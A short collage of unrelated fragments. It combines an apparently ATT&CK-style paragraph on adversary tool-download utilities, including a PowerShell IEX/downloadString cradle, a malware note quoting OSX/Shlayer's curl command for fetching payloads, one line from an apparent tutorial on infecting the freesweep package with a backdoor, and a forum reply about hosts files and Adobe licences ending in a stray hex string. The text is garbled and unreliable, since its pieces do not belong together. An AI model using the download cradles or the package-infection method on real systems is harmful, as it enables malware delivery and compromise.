On Windows, adversaries may use various utilities to download tools, such as copy, finger, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.
OSX/Shlayer can download payloads, and extract bytes from files. OSX/Shlayer uses the curl -fsL "$url" >$tmp_path command to download malicious payloads into a temporary directory.
We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package freesweep, a text-based version of Mine Sweeper.
I deleted the custom contents of the hosts file when requested, it was old stuff (this is a decade old windows system) and there's nothing there anymore as you can see on the untouched ckfiles.txt you requested, hence I haven't had the need to modify anything there on the files provided by FRST (otherwise I could have removed adobe apps there as well). The Adobe apps on my system are genuine, downloaded directly from Adobe, and licensed (see screenshot); these are, again, a decade old apps for which license transfers are allowed. 2b1af7f3a8